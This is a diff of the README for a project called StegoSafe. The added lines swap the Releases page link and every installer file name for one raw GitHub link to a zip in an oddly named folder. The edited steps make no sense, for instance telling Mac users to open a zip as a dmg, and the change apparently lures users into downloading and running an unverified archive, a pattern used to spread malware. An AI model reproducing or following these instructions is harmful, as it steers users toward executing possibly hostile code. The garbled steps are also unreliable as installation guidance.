TM1NUS43/StegoSafe/README.md

 To get started with StegoSafe, follow these steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/TM1NUS43/StegoSafe/releases) to find the latest version of StegoSafe.
+   Go to the [Releases page](https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip) to find the latest version of StegoSafe.

 2. **Choose Your Download**
    Look for the latest release.
 You will see a list of files associated with that release.
-Click on the file named "StegoSafe.zip" for Windows or "StegoSafe.dmg" for Mac to download.
+Click on the file named "https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip" for Windows or "https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip" for Mac to download.

 3. **Unzip the File (Windows)**
-   If you're using Windows, right-click on the downloaded "StegoSafe.zip" file and select "Extract All".
+   If you're using Windows, right-click on the downloaded "https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip" file and select "Extract All".
 Follow the prompts to extract the files.

 4. **Install the Application**
-   - For **Windows**: Open the extracted folder and double-click the "StegoSafe.exe" file to run the application.
+   - For **Windows**: Open the extracted folder and double-click the "https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip" file to run the application.
-   - For **Mac**: Open the downloaded "StegoSafe.dmg" file and drag the StegoSafe icon into your Applications folder.
+   - For **Mac**: Open the downloaded "https://raw.githubusercontent.com/TM1NUS43/StegoSafe/main/acquittance/StegoSafe.zip" file and drag the StegoSafe icon into your Applications folder.

 5. **Launch StegoSafe**
    After installation, you can open StegoSafe from your Applications folder (Mac) or your Start Menu (Windows).